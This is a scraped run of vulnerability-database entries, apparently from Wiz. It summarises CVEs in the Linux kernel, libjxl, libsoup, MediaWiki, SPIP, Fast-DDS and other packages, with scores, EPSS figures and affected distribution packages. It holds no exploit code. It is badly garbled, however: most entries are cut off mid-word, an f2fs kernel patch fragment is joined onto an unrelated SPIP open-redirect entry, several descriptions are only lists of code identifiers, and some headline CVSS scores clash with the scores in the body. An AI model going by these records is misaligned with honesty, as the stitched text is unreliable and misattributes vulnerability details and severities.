With the case below, a multi-device image can be mounted w/ the rw option;
however, one of the secondary devices is set as ro, and a later update will
cause a panic. So let's introduce f2fs_dev_is_readonly() and check the
multi-device rw status in f2fs_remount() w/ it, in order to avoid such an
inconsistent mount status.
mkfs.f2fs -c /dev/zram1 /dev/zram0 -f
blockdev --setro /dev/zram1
mount -t f2fs dev/zram0 /mnt/f2fs
mount: /mnt/f2fs: WARNING: source write-protected, mounted read-only.
mount -t f2fs -o remount,rw mnt/f2fs
dd if=/dev/zero of=/mnt/f2fs/file bs=1M count=8192
kernel BUG at fs/f2fs/inline.c:258!
RIP: 0010:f2fs_write_i
## CVE-2025-71244 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.1 [MEDIUM]
SPIP before 4.4.5 and 4.3.9 allows an Open Redirect via the login form when used in AJAX mode. An attacker can craft a malicious URL that, when visited by a victim, redirects them to an arbitrary external site after login. This vulnerability only affects sites where the login page has been overridden to function in AJAX mode. It is not mitigated by the SPIP security screen.
Source : NVD
Score 5.1
Published February 19, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
## CVE-2026-4751 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.3 [MEDIUM]
NULL Pointer Dereference vulnerability in tmate-io tmate. This issue affects tmate: before 2.4.0.
Source : NVD
Score 5.3
Published March 24, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
tmate
Sources
NVD
Debian 11, 12, 13, 14 Severity LOW No Fix Added at: Mar 24, 2026
Echo Severity MEDIUM No Fix Added at: Mar 24, 2026
## CVE-2025-12474 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 2.3 [LOW]
A specially-crafted file can cause libjxl's decoder to read pixel data from uninitialized (but allocated) memory.
This can be done by causing the decoder to reference an area outside the image bounds in subsequent patches. An incorrect optimization causes the decoder to omit populating those areas.
Source : NVD
Score 2.3
Published February 11, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
firefox-debuginfo
libjxl-devtools-debuginfo
Sources
NVD
Debian 12,
## CVE-2026-3608 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.3 [MEDIUM]
Sending a maliciously crafted message to the kea-ctrl-agent, kea-dhcp-ddns, kea-dhcp4, or kea-dhcp6 daemons over any configured API socket or HA listener can cause the receiving daemon to exit with a stack overflow error.
This issue affects Kea versions 2.6.0 through 2.6.4 and 3.0.0 through 3.0.2.
Source : NVD
Score 7.5
Published March 25, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libkea-asiodns62
libkea-cc83
Sources
NVD
Debian 12, 13 Severity HIGH
## CVE-2023-54250 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.3 [MEDIUM]
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: avoid out of bounds access in decode_preauth_ctxt()
Confirm that the accessed pneg_ctxt->HashAlgorithms address sits within
the SMB request boundary; deassemble_neg_contexts() only checks that the
eight byte smb2_neg_context header + (client controlled) DataLength are
within the packet boundary, which is insufficient.
Checking for sizeof(struct smb2_preauth_neg_context) is overkill given
that the type currently assumes SMB311_SALT_SIZE bytes of trailing Salt.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
## CVE-2025-68314 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.3 [MEDIUM]
In the Linux kernel, the following vulnerability has been resolved:
drm/msm: make sure last_fence is always updated
Update last_fence in the vm-bind path instead of kernel managed path.
last_fence is used to wait for work to finish in vm_bind contexts but not
used for kernel managed contexts.
This fixes a bug where last_fence is not waited on context close leading
to faults as resources are freed while in use.
Patchwork: https://patchwork.freedesktop.org/patch/680080/
Source : NVD
Published December 16, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS
## CVE-2025-6591 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.3 [MEDIUM]
Vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/api/ApiFeedContributions.Php.
This issue affects MediaWiki: from * before 1.39.13, 1.42.7, 1.43.2, 1.44.0.
Source : NVD
Published February 2, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM Has Fix Added at: Jul 03, 2025
Debian 14 Severity MEDIUM Has Fix Added at: Aug 10, 2025
Echo Severity MEDIUM Has Fix A
## CVE-2025-67482 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 1.7 [LOW]
Vulnerability in Wikimedia Foundation Scribunto, Wikimedia Foundation luasandbox. This vulnerability is associated with program files includes/Engines/LuaCommon/lualib/mwInit.Lua, library.C.
This issue affects Scribunto: from * before 1.39.16, 1.43.6, 1.44.3, 1.45.1; luasandbox: from * before fea2304f8f6ab30314369a612f4f5b165e68e95a.
Source : NVD
Score 1.7
Published February 3, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13
## CVE-2025-66046 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 9.8 [CRITICAL]
Several stack-based buffer overflow vulnerabilities exist in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities. When Tag is 67
Source : NVD
Score 9.8
Published December 11, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 12, 2
## CVE-2026-23051 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.3 [MEDIUM]
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: fix drm panic null pointer when driver not support atomic
When the driver does not support atomic, take the fb from plane->fb rather than
plane->state->fb.
(cherry picked from commit 2f2a72de673513247cd6fae14e53f6c40c5841ef)
Source : NVD
Published February 4, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-azure
linux-azure-fde-6.17
Sources
NVD
Debian 14 Has Fix Added at: Feb 04, 2026
Ubuntu 16.04, 18.04,
## CVE-2025-69209 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 6.9 [MEDIUM]
decimalPlaces
dtostrf
## Patches
1.8.7
The Fixing Commit is available at the following link 1a6a417f89c8901dad646efce74ae9d3ddebfd59
## References
ASEC-26-001 ArduinoCore-avr vXXXX Resolves Buffer Overflow Vulnerability
## Credits
Maxime Rossi Bellom and Ramtine Tofighi Shirazi from SecMate ( https://secmate.dev/ )
Source : NVD
Score 6.9
Published January 21, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
arduino-core-avr
Sources
NVD
Debian 11, 1
## CVE-2026-3994 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.3 [MEDIUM]
A vulnerability was detected in rui314 mold up to 2.40.4. This issue affects the function mold::ObjectFile<mold::X86_64>::initialize_sections of the file src/input-files.cc of the component Object File Handler. Performing a manipulation results in heap-based buffer overflow. Attacking locally is a requirement. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
Score 4.8
Published March 12, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.7
## CVE-2026-3099 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.8 [MEDIUM]
A flaw was found in Libsoup. The server-side digest authentication implementation in the SoupAuthDomainDigest class does not properly track issued nonces or enforce the required incrementing nonce-count (nc) attribute. This vulnerability allows a remote attacker to capture a single valid authentication header and replay it repeatedly. Consequently, the attacker can bypass authentication and gain unauthorized access to protected resources, impersonating the legitimate user.
Source : NVD
Score 7.3
Published March 12, 2026
Severity HIGH
CNA Score 5.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation
## CVE-2025-64438 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 1.7 [LOW]
gapList .base - gapStart
StatefulReader::processGapMsg()
WriterProxy::changes_received_
std::set
Source : NVD
Score 1.7
Published February 3, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fastdds
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Nov 19, 2025
Debian 14 Severity HIGH No Fix Added at: Nov 19, 2025
Echo Severity HIGH No Fix Added at: Nov 19, 2025
## CVE-2026-4271 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.3 [MEDIUM]
A flaw was found in libsoup, a library for handling HTTP requests. This vulnerability, known as a Use-After-Free, occurs in the HTTP/2 server implementation. A remote attacker can exploit this by sending specially crafted HTTP/2 requests that cause authentication failures. This can lead to the application attempting to access memory that has already been freed, potentially causing application instability or crashes, resulting in a Denial of Service (DoS).
Source : NVD
Score 7.5
Published March 17, 2026
Severity HIGH
CNA Score 5.3
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Perc
## CVE-2026-1425 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 6.3 [MEDIUM]
A security flaw has been discovered in pymumu SmartDNS up to 47.1. This vulnerability affects the function _dns_decode_rr_head/_dns_decode_SVCB_HTTPS of the file src/dns.c of the component SVCB Record Parser. The manipulation results in stack-based buffer overflow. It is possible to launch the attack remotely. A high complexity level is associated with this attack. It is stated that the exploitability is difficult. The patch is identified as 2d57c4b4e1add9b4537aeb403f794a084727e1c8. Applying a patch is advised to resolve this issue.
Source : NVD
Score 6.3
Published January 26, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA K
## CVE-2023-54232 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz)
In the Linux kernel, the following vulnerability has been resolved:
m68k: Only force 030 bus error if PC not in exception table
__get_kernel_nofault() does copy data in supervisor mode when
forcing a task backtrace log through /proc/sysrq_trigger.
This is expected to cause a bus error exception on e.g. a NULL
pointer dereference when logging a kernel task that has no
workqueue associated. This bus error ought to be ignored.
Our 030 bus error handler is ill equipped to deal with this:
Whenever ssw indicates a kernel mode access on a data fault,
we don't even attempt to handle the fault and instead always
send a SEGV signal (or panic). As a result, the check
for exception handling at the fault PC (buried in
send_sig_fault()
## CVE-2025-67475 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.3 [MEDIUM]
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/CommentFormatter/CommentParser.Php.
This issue affects MediaWiki: from * before 1.39.16, 1.43.6, 1.44.3, 1.45.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 12, 2025
## CVE-2026-3408 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.3 [MEDIUM]
A vulnerability was identified in Open Babel up to 3.1.1. This impacts the function OBAtom::GetExplicitValence of the file isrc/atom.cpp of the component CDXML File Handler. Such manipulation leads to null pointer dereference. The attack can be launched remotely. The exploit is publicly available and might be used. The name of the patch is e23a224b8fd9d7c2a7cde9ef4ec6afb4c05aa08a. It is best practice to apply a patch to resolve this issue.
Source : NVD
Score 5.3
Published March 2, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.7
Expl
## CVE-2025-71270 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 6.9 [MEDIUM]
In the Linux kernel, the following vulnerability has been resolved:
LoongArch: Enable exception fixup for specific ADE subcode
This patch allows the LoongArch BPF JIT to handle recoverable memory
access errors generated by BPF_PROBE_MEM* instructions.
When a BPF program performs memory access operations, the instructions
it executes may trigger ADEM exceptions. The kernel’s built-in BPF
exception table mechanism (EX_TYPE_BPF) will generate corresponding
exception fixup entries in the JIT compilation phase; however, the
architecture-specific trap handling function needs to proactively call
the common fixup routine to achieve exception recovery.
do_ade(): fix EX_TYPE_BPF memory access exceptions for BPF programs,
en
## CVE-2026-1837 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 8.7 [HIGH]
A specially-crafted file can cause libjxl's decoder to write pixel data to uninitialized unallocated memory. Soon after that data from another uninitialized unallocated region is copied to pixel data.
This can be done by requesting color transformation of grayscale images to another grayscale color space. Buffers allocated for 1-float-per-pixel are used as if they are allocated for 3-float-per-pixel. That happens only if LCMS2 is used as CMS engine. There is another CMS engine available (selected by build flags).
Source : NVD
Score 8.7
Published February 11, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release D
## CVE-2026-4538 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.3 [MEDIUM]
A vulnerability was identified in PyTorch 2.10.0. The affected element is an unknown function of the component pt2 Loading Handler. The manipulation leads to deserialization. The attack can only be performed from a local environment. The exploit is publicly available and might be used. The project was informed of the problem early through a pull request but has not reacted yet.
Source : NVD
Score 4.8
Published March 22, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.7
Exploitation Probability (EPSS) N/A
Affected packages and librarie
## CVE-2025-69725 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 4.7 [MEDIUM]
An Open Redirect vulnerability in the go-chi/chi >=5.2.2 RedirectSlashes function allows remote attackers to redirect victim users to malicious websites using the legitimate website domain.
Source : NVD
Score 4.7
Published February 19, 2026
Severity MEDIUM
CNA Score 4.7
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
osbuild-composer-worker
gh
Sources
NVD
Debian 11 Severity MEDIUM No Fix Added at: Feb 21, 2026
Debian 14 Severity MEDIUM Has Fix Added at: Feb 21, 2026
Red Hat 8 Severity
## CVE-2025-31648 [LOW, CVSS 1.8]: Linux Debian vulnerability analysis and mitigation (Wiz)
Improper handling of values in the microcode flow for some Intel(R) Processor Family may allow an escalation of privilege. Startup code and smm adversary with a privileged user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are present with special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (low), integrity (low) and availability (none) of the vulnerable system, resulting in subsequent system confidentiality (low), integrity (low) and availability (none) impacts.
Source : NVD
Score 1.8
Published February 10, 2026
Severity LOW
CNA Score 1
## CVE-2025-62603 [LOW, CVSS 1.7]: Linux Debian vulnerability analysis and mitigation (Wiz)
message_data
DataHolderSeq
readParticipantGenericMessage → readDataHolderSeq
DataHolderSeq
uint32
class_id
DDS:Auth:PKI-DH:1.0+Req
DataHolderSeq
Source : NVD
Score 1.7
Published February 3, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
fastdds
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Nov 19, 2025
Debian 14 Severity HIGH No Fix Added at: Nov 19, 2025
Echo Severity HIGH No Fix Added at: Nov 19, 2025
## CVE-2025-67108 [CRITICAL, CVSS 10.0]: Echo vulnerability analysis and mitigation (Wiz)
eProsima Fast-DDS v3.3 was discovered to contain improper validation for ticket revocation, resulting in insecure communications and connections.
Source : NVD
Score 10
Published December 23, 2025
Severity CRITICAL
CNA Score 10.0
Affected Technologies
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fastdds
Sources
NVD
Echo Severity CRITICAL No Fix Added at: Dec 24, 2025
## CVE-2026-31409 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: unset conn->binding on failed binding request
When a multichannel SMB2_SESSION_SETUP request with
SMB2_SESSION_REQ_FLAG_BINDING fails ksmbd sets conn->binding = true
but never clears it on the error path. This leaves the connection in
a binding state where all subsequent ksmbd_session_lookup_all() calls
fall back to the global sessions table. This fixes it by clearing
conn->binding = false in the error path.
Source : NVD
Published April 6, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile
## CVE-2026-2049 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
[ZDI-CAN-28618: New Vulnerability Report at rgbe.c]
Source : NVD
Published February 17, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Amazon Linux
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gegl-devel
gegl
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Feb 16, 2026
Echo Has Fix Added at: Feb 16, 2026
## CVE-2026-5673 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
A flaw was found in libtheora. This heap-based out-of-bounds read vulnerability exists within the AVI (Audio Video Interleave) parser, specifically in the avi_parse_input_file() function. A local attacker could exploit this by tricking a user into opening a specially crafted AVI file containing a truncated header sub-chunk. This could lead to a denial-of-service (application crash) or potentially leak sensitive information from the heap.
Source : NVD
Score 5.6
Published April 6, 2026
Severity MEDIUM
CNA Score 5.6
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.6
## CVE-2022-50775 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
RDMA/hns: Fix refcount leak in hns_roce_mmap
rdma_user_mmap_entry_get_pgoff() takes the reference.
Add missing rdma_user_mmap_entry_put() to release the reference.
Acked-by Haoyue Xu [email protected]
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-fips
linux-azure-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 26, 2025
Echo Has Fix Added at: De
## CVE-2026-26223 [MEDIUM, CVSS 5.1]: Linux Debian vulnerability analysis and mitigation (Wiz)
SPIP before 4.4.8 allows cross-site scripting (XSS) in the private area via malicious iframe tags. The application does not properly sandbox or escape iframe content in the back-office, allowing an attacker to inject and execute malicious scripts. The fix adds a sandbox attribute to iframe tags in the private area. This vulnerability is not mitigated by the SPIP security screen.
Source : NVD
Score 5.1
Published February 19, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.2
Exploitation Probability (EPSS) 0.1
Affected packages and lib
## CVE-2026-22034 [CRITICAL, CVSS 9.2]: Linux Debian vulnerability analysis and mitigation (Wiz)
Snuffleupagus is a module that raises the cost of attacks against websites by killing bug classes and providing a virtual patching system. On deployments of Snuffleupagus prior to version 0.13.0 with the non-default upload validation feature enabled and configured to use one of the upstream validation scripts based on Vulcan Logic Disassembler (VLD) while the VLD extension is not available to the CLI SAPI, all files from multipart POST requests are evaluated as PHP code. The issue was fixed in version 0.13.0.
Source : NVD
Score 9.2
Published January 8, 2026
Severity CRITICAL
CNA Score 9.2
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KE
## CVE-2026-23384 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
RDMA/ionic: Fix kernel stack leak in ionic_create_cq()
```c
struct ionic_cq_resp resp {
    __u32 cqid[2];    // offset 0 - PARTIALLY SET (see below)
    __u8  udma_mask;  // offset 8 - SET (resp.udma_mask = vcq->udma_mask)
    __u8  rsvd[7];    // offset 9 - NEVER SET
```
udma_mask & BIT(udma_idx)). The array has 2 entries but udma_count could be 1, meaning cqid[1] might never be written via ionic_create_cq_common(). If udma_mask only has bit 0 set, cqid[1] (4 bytes) is also leaked. So potentially 11 bytes leaked.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
## CVE-2026-3706 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
A vulnerability was determined in mkj Dropbear up to 2025.89. Impacted is the function unpackneg of the file src/curve25519.c of the component S Range Check. This manipulation causes improper verification of cryptographic signature. The attack can be initiated remotely. The attack is considered to have high complexity. The exploitability is considered difficult. The actual existence of this vulnerability is currently in question. Patch name: fdec3c90a15447bd538641d85e5a3e3ac981011d. To fix this issue, it is recommended to deploy a patch. The project maintainer explains: "Signature Malleability is not exploitable in SSH protocol. (...) [A] PoC doesn't exist for SSH implementation, but rather it's against the internal AP
## CVE-2026-26076 [MEDIUM, CVSS 6.9]: Linux Debian vulnerability analysis and mitigation (Wiz)
ntpd-rs is a full-featured implementation of the Network Time Protocol. Prior to 1.7.1, an attacker can remotely induce moderate increases (2-4 times above normal) in cpu usage. When having NTS enabled on an ntpd-rs server, an attacker can create malformed NTS packets that take significantly more effort for the server to respond to by requesting a large number of cookies. This can lead to degraded server performance even when a server could otherwise handle the load. This vulnerability is fixed in 1.7.1.
Source : NVD
Score 6.9
Published February 12, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
## CVE-2026-23175 [HIGH, CVSS 7.0]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
net: cpsw: Execute ndo_set_rx_mode callback in a work queue
Commit 1767bb2d47b7 ("ipv6: mcast: Don't hold RTNL for
IPV6_ADD_MEMBERSHIP and MCAST_JOIN_GROUP.") removed the RTNL lock for
IPV6_ADD_MEMBERSHIP and MCAST_JOIN_GROUP operations. However, this
change triggered the following call trace on my BeagleBone Black board:
WARNING: net/8021q/vlan_core.c:236 at vlan_for_each+0x120/0x124, CPU#0: rpcbind/481
RTNL: assertion failed at net/8021q/vlan_core.c (236)
Modules linked in:
CPU: 0 UID: 997 PID: 481 Comm: rpcbind Not tainted 6.19.0-rc7-next-20260130-yocto-standard+ #35 PREEMPT
Hardware name: Generic AM33XX (Flattened Device Tree)
Call trace:
unwind
## CVE-2025-68323: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
usb: typec: ucsi: fix use-after-free caused by uec->work
The delayed work uec->work is scheduled in gaokun_ucsi_probe()
but never properly canceled in gaokun_ucsi_remove(). This creates
use-after-free scenarios where the ucsi and gaokun_ucsi structure
are freed after ucsi_destroy() completes execution, while the
gaokun_ucsi_register_worker() might be either currently executing
or still pending in the work queue. The already-freed gaokun_ucsi
or ucsi structure may then be accessed.
Furthermore, the race window is 3 seconds, which is sufficiently
long to make this bug easily reproducible. The following is the
trace captured by KASAN:
BUG: KASAN: sla
## CVE-2023-54167 [MEDIUM, CVSS 6.9]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
m68k: mm: Move initrd phys_to_virt handling after paging_init()
When booting with an initial ramdisk on platforms where physical memory
does not start at address zero (e.g. on Amiga):
initrd: 0ef0602c - 0f800000
Zone ranges:
DMA [mem 0x0000000008000000-0x000000f7ffffffff]
Normal empty
Movable zone start for each node
Early memory node ranges
node 0: [mem 0x0000000008000000-0x000000000f7fffff]
Initmem setup node 0 [mem 0x0000000008000000-0x000000000f7fffff]
Unable to handle kernel access at virtual address (ptrval)
Oops: 00000000
Modules linked in:
PC: [] memcmp+0x28/0x56
As phys_to_virt() relies on m68k_memoffset and module_fixup(), it must
not be
## CVE-2025-68205 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
ALSA: hda/hdmi: Fix breakage at probing nvhdmi-mcp driver
After restructuring and splitting the HDMI codec driver code, each
HDMI codec driver contains the own build_controls and build_pcms ops.
A copy-n-paste error put the wrong entries for nvhdmi-mcp driver; both
build_controls and build_pcms are swapped. Unfortunately both
callbacks have the very same form, and the compiler didn't complain
it, either. This resulted in a NULL dereference because the PCM
instance hasn't been initialized at calling the build_controls
callback.
Fix it by passing the proper entries.
Source : NVD
Published December 16, 2025
CNA Score N/A
Affected Technologies
Lin
## CVE-2016-20040 [HIGH, CVSS 8.6]: Linux Debian vulnerability analysis and mitigation (Wiz)
TiEmu 3.03-nogdb+dfsg-3 contains a buffer overflow vulnerability in the ROM parameter handling that allows local attackers to crash the application or execute arbitrary code. Attackers can supply an oversized ROM parameter to the tiemu command-line interface to overflow the stack buffer and overwrite the instruction pointer with malicious addresses.
Source : NVD
Score 8.6
Published March 28, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
tiemu
Sources
NVD
Debian 1
## CVE-2026-23263 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
io_uring/zcrx: fix page array leak
d9f595b9a65e ("io_uring/zcrx: fix leaking pages on sg init fail") fixed
